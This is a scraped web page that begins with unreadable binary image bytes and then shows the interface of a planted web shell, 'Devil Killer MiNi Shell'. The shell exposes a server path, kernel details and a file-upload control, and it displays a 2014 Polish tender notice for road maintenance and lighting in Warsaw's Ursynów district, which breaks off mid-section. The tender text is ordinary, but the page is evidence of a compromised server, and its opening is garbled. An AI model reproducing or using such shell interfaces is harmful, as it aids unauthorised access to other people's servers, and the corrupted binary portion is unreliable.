JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140313/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140313/84634-N-2014.html

<p class="kh_header"><b>Warszawa: Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</b><br>
<b>Numer ogłoszenia: 84634 - 2014; data zamieszczenia: 13.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

Zamawiający w przedmiotowym zamówieniu przewidział trzy niżej wymienione części zwane dalej Częściami lub Zadaniami:

Część 1. Utrzymanie, remont, konserwacja, naprawa dróg gminnych oraz drogach będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.
Część 2. Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego w ramach utrzymania i wdrażanie projektów organizacji ruchu w drogach gminnych oraz drogach będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.
Część 3. Utrzymanie, remont, konserwacja i naprawa oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

4.1. Dotyczy Części 1 zamówienia tj. ZADANIE 1

Przedmiotem zamówienia jest: Utrzymanie, remont, konserwacja, naprawa dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

I. Zakres prac objętych zamówieniem obejmuje: 
1. Naprawy - roboty związane z usuwaniem awarii, a w szczególności likwidacją uszkodzeń nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego.
2. Utrzymanie - roboty związane z bieżącym wykonywaniem prac zmierzających do zwiększenia bezpieczeństwa i wygody ruchu.
3. Konserwacja - roboty związane z wykonywaniem napraw bieżących nawierzchni jezdni i chodników bez zmiany konstrukcji nawierzchni.
4. Remonty - roboty związane z wykonywaniem prac przywracających pierwotny stan drogi, także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym.

II. Zakres rzeczowy robót objętych przedmiotem zamówienia.
1. Konserwacja i remonty cząstkowe ulic na terenie Dzielnicy Ursynów na całej szerokości   pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1.1.  Roboty ziemne:
- roboty ziemne mechaniczne z odwiezieniem urobku.
1.2.  Warstwy odsączające i podsypkowe i podbudowy:
- warstwy podsypkowe cementowo - piaskowe,
- podbudowy betonowe,
- podbudowy z tłucznia kamiennego sortowanego
1.3.  Nawierzchnie dróg nieulepszone:
- nawierzchnie gruntowe,
- nawierzchnie żwirowe i z kruszywa kamiennego,
- nawierzchnie tłuczniowe kamiennego,
-nawierzchnie brukowe,
- nawierzchnie z płyt żelbetowych (MON),
- nawierzchnie z płyt drogowych wielootworowych,
- nawierzchnie z płyt drogowych o grubości 15 cm.
1.4.  Nawierzchnie ulepszone:
- nawierzchnie z  mieszanek mineralno-bitumicznych grysowych,
- nawierzchnie z  mieszanek mastyksowo- grysowej (SMA), 
- nawierzchnie z kostki brukowej,
- ułożenie geowłókniny,  sitaki wzmacniającej.
1.5.  Krawężniki i obrzeża:
- krawężniki  kamienne  na podsypce cementowo - piaskowej na ławach z oporem
- krawężniki  betonowe  na podsypce cementowo - piaskowej na ławach z oporem ,
- obrzeża betonowe 30x8 cm na podsypce piaskowej.
1.6. Chodniki
- chodniki z kostki brukowej  betonowej grubości  8cm i 6 cm na podsypce  piaskowej i cementowo-piaskowej.
- chodniki z płyt betonowych 50x50x7 cm na podsypce piaskowej.
1.7.  Roboty rozbiórkowe
- rozebranie i frezowanie  nawierzchni z mas mineralno - bitumicznych z odwiezieniem gruzu: 
- rozebranie nawierzchni z płyt żelbetowych MON,
- nawierzchni  z płyt drogowych wielootworowych,
- rozebranie chodników z płyt betonowych i rozebranie nawierzchni  z kostki brukowej  z odwiezieniem gruzu,
- rozebranie krawężników betonowych,
- rozebranie obrzeży trawnikowych.
1.8. Remonty cząstkowe jezdni o nawierzchniach bitumicznych z odwiezieniem gruzu:
- zabezpieczenie uszkodzonej nawierzchni,
- remonty cząstkowe nawierzchni bitumicznych  mieszanką mineralno - asfaltową.
1.9.  Roboty naprawczo - konserwacyjne:
- naprawy dróg gruntowych - profilowanie z  zagęszczeniem,
- ścinanie poboczy z odwiezieniem ziemi.
1.10. Urządzenia odwodnieniowe:
- ułożenie rur drenarskich fi 100 mm i fi 300 mm,
- odtworzenie rowów odparowalnych,
- oczyszczenie studni chłonnych,
- regulacja  pionowa  zaworów wodociągowych, gazowych, włazów kanałowych, kratek ściekowych ulicznych oraz studni teletechnicznych.
1.11. Odtworzenie trawników
-  przekopanie gleby
- rozrzucenie ziemi żyznej lub kompostowej 
- wykonanie trawników dywanowych siewem.
1.12. Opracowanie czasowej organizacji ruchu związanej z remontem  kapitalnym nawierzchni dróg. 

III. Sposób realizacji przedmiotu zamówienia w zakresie utrzymania, remontu, konserwacji, naprawy dróg gminnych oraz dróg będących. 
1.1. Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokółu wprowadzenia.
- W protokóle będzie określony zakres robót i termin wykonania. Po sporządzeniu  protokółu wprowadzenia Wykonawca zobowiązany jest wykonać dokumentację zdjęciową danego obiektu.
- Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami.
- Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu. 
- Wykonawca dokumentuje wykonanie poszczególnego etapu robót budowlanych poprzez  wykonanie  zdjęć.
- Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru.
1.2.  Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
- bezusterkowego protokołu odbioru,
- zaakceptowanych przez zamawiającego obmiarów i kosztorysów powykonawczych wraz ze szkicem sytuacyjnym.
1.3. Odbiór trawników po pierwszym koszeniu.

Przy powstawaniu nowych zrealizowanych inwestycji drogowych Wykonawca wykonuje dokumentację powykonawczą z naniesieniem na mapę zasadniczą miasta.

Szczegółowy opis przedmiotu zamówienia dla Części 1 określa również treść załącznika nr 1 do wzoru umowy oraz:
a)wzór umowy stanowiący załącznik nr 6a) do SIWZ
b)przedmiar robót - załącznik nr 7a) do SIWZ;
c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 8a) do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy. 
d)wykaz dróg gminnych stanowiący załącznik nr 9 do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, 
e)wykaz dróg wewnętrznych stanowiący załącznik nr 10 do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy

4.2. Dotyczy Części 2 zamówienia tj. ZADANIE 2
Przedmiotem zamówienia jest oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu w ramach bieżącego utrzymania i wdrażanie projektów organizacji ruchu na drogach gminnych i drogach wewnętrznych będących  we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

I. Zakres prac objętych zamówieniem obejmuje: 
1.  Poprawa oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu 
2. Wdrażanie projektów organizacji ruchu 

II. Zakres rzeczowy robót objętych przedmiotem zamówienia.
1. Poprawa oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego
- odnawianie oznakowania poziomego jezdni farbą chlorokauczukową i chlorokauczukową z  dodatkami mikrokulek szklanych
- wymiana oznakowania pionowego zniszczonych znaków drogowych, słupków do znaków drogowych luster okrągłych i prostokątnych oraz słupków wygrodzeniowych, łańcuchów  i  pylonów oraz zapór
- prostowanie sztyc do znaków drogowych i słupków wygrodzeniowych
- naprawa i wykonywanie urządzeń bezpieczeństwa ruchu drogowego
2. Wdrażanie projektów organizacji ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego zgodnie z zatwierdzonymi projektami oraz ze szczegółowymi warunkami technicznymi dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkami ich umieszczania na drogach określonymi w załącznikach 1-4 do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach

III. Sposób realizacji przedmiotu zamówienia w zakresie poprawy oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu oraz wdrażania projektów organizacji ruchu              
1. Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokółu wprowadzenia.
- W protokóle będzie określony zakres robót i termin wykonania.
- Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami.
- Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu.
- Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru.
2.  Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
- bezusterkowego protokołu odbioru,
- zaakceptowanych przez zamawiającego obmiarów i kosztorysów powykonawczych.

Szczegółowy opis przedmiotu zamówienia dla Części 2 określa również treść załącznika nr 1 do wzoru umowy oraz:
a)wzór umowy stanowiący załącznik nr 6b) do SIWZ
b)przedmiar robót - załącznik nr 7b) do SIWZ
c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 8b) do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy. 
d)wykaz dróg gminnych stanowiący załącznik nr 9 do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy
e)wykaz dróg wewnętrznych stanowiący załącznik nr 10 do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy

4.3. Dotyczy Części 3 zamówienia tj. ZADANIE 3

Przedmiotem zamówienia jest: Utrzymanie, budowa, remont, konserwacja i naprawa oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

I. Zakres prac objętych zamówieniem obejmuje:
1.Naprawy - roboty związane z usuwaniem awarii, a w szczególności likwidacją uszkodzeń
2.Utrzymanie i konserwacja - roboty związane z wykonywaniem napraw bieżących
3.Remonty - roboty związane z wykonywaniem prac przywracających pierwotny stan, także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym.
4.Budowę - oświetlenia ulic związanych z zgłoszeniami radnych i mieszkańców o niedoświetlonych miejscach

II. Zakres rzeczowy robót objętych przedmiotem zamówienia.
Budowa, modernizacja, konserwacja i remonty oświetlenia ulic na terenie Dzielnicy Ursynów a w szczególności wykonywanie robót w następujących zakresach:
1.Roboty ziemne :
-kopanie rowu kablowego
-kopanie dołków pod fundamenty prefabrykowane
-wykonanie przepustu pod jezdnią
-wykonanie przepustów przy drzewach
-nasypanie warstwy piasku
-zasypanie rowu kablowego
2.Roboty demontażowe :
-demontaż słupów oświetleniowych
-demontaż opraw oświetleniowych
-demontaż urządzenia rozdzielczego szafy oświetleniowej
-demontaż linii zasilającej
3.Roboty montażowe :
-montaż w rowie kablowym rur ochronnych dla kabla oświetleniowego
-montaż w dołach fundamentów prefabrykowanych
-montaż na fundamentach słupów oświetleniowych
-montaż słupów ŻN
-montaż słupów wirowanych
-montaż konstrukcji i osprzętu linii napowietrznej
-montaż przewodów AsXSn linii napowietrznej
-wciągnięcie w rury ochronne i fundamenty kabla oświetleniowego
-montaż na słupach wysięgników
-montaż na słupach opraw oświetleniowych
-montaż na słupach naświetlaczy metalohlogenkowych
-montaż we wnękach słupowych tabliczek bezpiecznikowo-zaciskowych
-montaż w słupach przewodu do zasilenia opraw oświetleniowych
-montaż uziomów
-montaż muf kablowych
-montaż urządzenia rozdzielczego SOK-4
4. Prace kontrolno-pomiarowe
-pomiar oporności kabla
-pomiary skuteczności ochrony przeciwporażeniowej
-pomiar natężenia oświetlenia
5. Prace projektowe
-opracowanie projektów na budowę lub modernizację oświetlenia

III. Sposób realizacji przedmiotu zamówienia w zakresie utrzymania, remontu, budowy, konserwacji, naprawy wraz z modernizacją oświetlenia.
1.1.Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez
Zamawiającego protokółu wprowadzenia.
-W protokóle będzie określony zakres robót i termin wykonania. Po sporządzeniu protokółu wprowadzenia Wykonawca zobowiązany jest wykonać dokumentację zdjęciową danego obiektu.
-Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami.
-Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu.
-Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru.

1.2.Prowadzenie prac w sąsiedztwie drzew:
Zaleca się kopanie rowu kablowego metodą odkrywkową , podkopu i zastosowanie rur ochronnych dla kabli giętkich by można je było przepleść pomiędzy korzeniami. W miejscach zbliżeń robót ziemnych z drzewami kable układać na głębokości minimum 1,2 metodą przecisku sterowanego , by nie uszkodzić systemu korzeniowego drzewa. Roboty ziemne ( kopanie rowu kablowego , kopanie dołów pod fundamenty słupów ) w okolicy drzew należy bezwzględnie wykonywać ręcznie. Drzewa rosnące w pasie frontu robót należy zabezpieczyć przed mechanicznymi uszkodzeniami, ze szczególnym uwzględnieniem ich systemów korzeniowych. Prace te powinny być wykonane przez specjalistyczną firmę ogrodniczą. W zasięgu koron drzew roboty ziemne należy wykonywać ręcznie, przy minimalnej ingerencji i ich systemy korzeniowe. Prace związane z montażem słupów oświetleniowych i opraw oświetleniowych wykonywane w pobliżu koron drzew należy wykonywać bez uszkadzania gałęzi i konarów. Wykonanie ewentualnych cięć technicznych koron należy zlecić specjalistycznej firmie ogrodniczej, zapewniając jednocześnie fachowy nadzór. Cięcia te powinny zostać ograniczone do niezbędnego minimum tak, aby zachować dotychczasowy pokrój koron drzew i powinny być uzgodnione z jednostką opiekującą się drzewami z ramienia zarządcy ulicy. Zabrania się jeżdżenia ciężkim sprzętem w zasięgu koron drzew oraz ich niszczenia. Po zakończeniu robót teren należy uporządkować i przywrócić do stanu pierwotnego. Wszelkie prace, w tym renowacje trawników, powinny być uzgodnione z administratorem terenu. Wszystkie roboty ziemne wykonywać pod nadzorem przedstawiciela Wydziału Ochrony Środowiska Urzędu Dzielnicy Ursynów. Koszt nadzorów i usług ogrodniczych ponosi Wykonawca.

1.3.Stosowane materiały :
Muszą spełniać normy i posiadać certyfikaty lub świadectwa zgodności oraz być zgodne z opiniami Wydziału Estetyki Przestrzeni Publicznej Biura Architektury i Planowania Przestrzennego Urzędu Miasta Stołecznego Warszawy.

1.4.Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
-bezusterkowego protokołu odbioru,
-zaakceptowanych przez zamawiającego obmiarów i kosztorysów powykonawczych wraz ze szkicem sytuacyjnym.
Wykonanie dokumentacji powykonawczej na budowę, modernizację, przebudowę oświetlenia ulicznego nastąpi na podstawie projektu lub ustaleń przeprowadzonych w dniu wprowadzenia.
Wykonanie dokumentacji projektowej na budowę, modernizację, przebudowę oświetlenia ulicznego nastąpi na podstawie materiałów i ustaleń przekazanych w dniu wprowadzenia.

Szczegółowy opis przedmiotu zamówienia dla Części 3 określa również treść załącznika nr 1 do wzoru umowy oraz:
a)wzór umowy stanowiący załącznik nr 6c) do SIWZ
b)przedmiar robót - załącznik nr 7c) do SIWZ;
c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 8c) do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy. 
d)wykaz dróg gminnych stanowiący załącznik nr 9 do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, 
e)wykaz dróg wewnętrznych stanowiący załącznik nr 10 do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy

Termin wykonania zamówienia zarówno w zakresie Części 1, Części 2 oraz Części 3 ustala się od dnia zawarcia umowy do dnia 10.12.2014 r. lub do wyczerpania maksymalnego wynagrodzenia, o którym mowa w § 8 ust. 1 wzoru umowy (stanowiącego odpowiednio załącznik nr 6a) do SIWZ dla Części 1, załącznik nr 6b) do SIWZ dla Części 2 oraz załącznik nr 6c) do SIWZ dla  Części 3) w zależności od tego które z tych zdarzeń nastąpi jako pierwsze..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Część 1. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia uzupełniające będą powtórzeniem tego samego rodzaju robót, zgodnych z przedmiotem zamówienia podstawowego i polegać będą na wykonaniu robót drogowych, robót w zakresie odwodnienia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

Część 2. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia uzupełniające będą powtórzeniem tego samego rodzaju robót, zgodnych z przedmiotem zamówienia podstawowego i polegać będą na wykonaniu robót drogowych, robót w zakresie regulacji ruchu i wdrożeniu projektów organizacji ruchu dróg gminnych oraz drogach będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

Część 3. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia uzupełniające będą powtórzeniem tego samego rodzaju robót, zgodnych z przedmiotem zamówienia podstawowego i polegać będą na wykonaniu robót oświetleniowych dróg gminnych oraz drogach będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 71.00.00.00-8, 45.23.31.50-5, 45.31.61.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości:
a)Część 1 - 100.000,00 złotych  (słownie: sto tysięcy złotych 00/100 groszy).
b)Część 2 - 10.000,00 złotych  (słownie: dziesięć tysięcy złotych 00/100 groszy).
c)Część 3 - 7.000,00 złotych  (słownie: siedem tysięcy złotych 00/100 groszy).

2.Wymagania dotyczące wnoszenia wadium:
Wadium wniesione w formach określonych w ppkt od 20.2.2. do 20.2.5 SIWZ - musi zawierać zobowiązanie, zgodne z art.46 ust.4a i ust.5 ustawy Prawo zamówień publicznych:
Zamawiający zatrzymuje wadium:
1. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
2. jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Ponadto w odniesieniu do gwarancji wadialnych, zastrzega się, iż z ich treści musi wynikać, że ma ona charakter bezwarunkowy, nieodwołalny, a suma gwarancyjna płatna jest na pierwsze żądanie.
3. Pozostałe wymagania dotyczące wnoszenia wadium określone zostały w pkt 20 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.DOTYCZY CZĘŚCI I ZAMÓWIENIA:
Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) co najmniej jedną robotę budowlaną polegającą min. na:
a)remoncie2, konserwacji3, naprawie4, budowie5 lub przebudowie6 - drogi/dróg o nawierzchni ulepszonej bitumicznej i łącznej powierzchni nie mniejszej niż 5 000m2;

oraz

b)wykonaniu7 nawierzchni z kostki betonowej o łącznej powierzchni nie mniejszej niż 2 000m2; 

UWAGA!
1  Za wykonaną robotę Zamawiający uzna taką robotę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.
2 Pod pojęciem remont należy rozumieć wykonywanie robót przywracających stan pierwotny drogi, a niestanowiących bieżącej konserwacji;
3 Pod pojęciem konserwacja należy rozumieć naprawy bieżące dróg bez zmiany konstrukcji nawierzchni;
4 Pod pojęciem naprawy należy rozumieć usuwanie awarii (likwidacja uszkodzeń oznakowania drogowego i nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego);
5 Pod pojęciem budowy należy rozumieć wykonywanie nowej drogi w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę drogi;
6 Pod pojęciem przebudowy należy rozumieć zmianę już istniejącej drogi, nie powodującej jednak powstania nowej jej części;
7 Pod pojęciem wykonania nawierzchni z kostki betonowej należy rozumieć wykonanie nowej nawierzchni z kostki betonowej;

2.DOTYCZY CZĘŚCI II ZAMÓWIENIA
Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) co najmniej jedną robotę budowlaną polegającą min. na:
a)ustawieniu znaku/ów pionowego/ych;

oraz

b)wykonaniu2 lub odnowieniu oznakowania poziomego.

UWAGA!
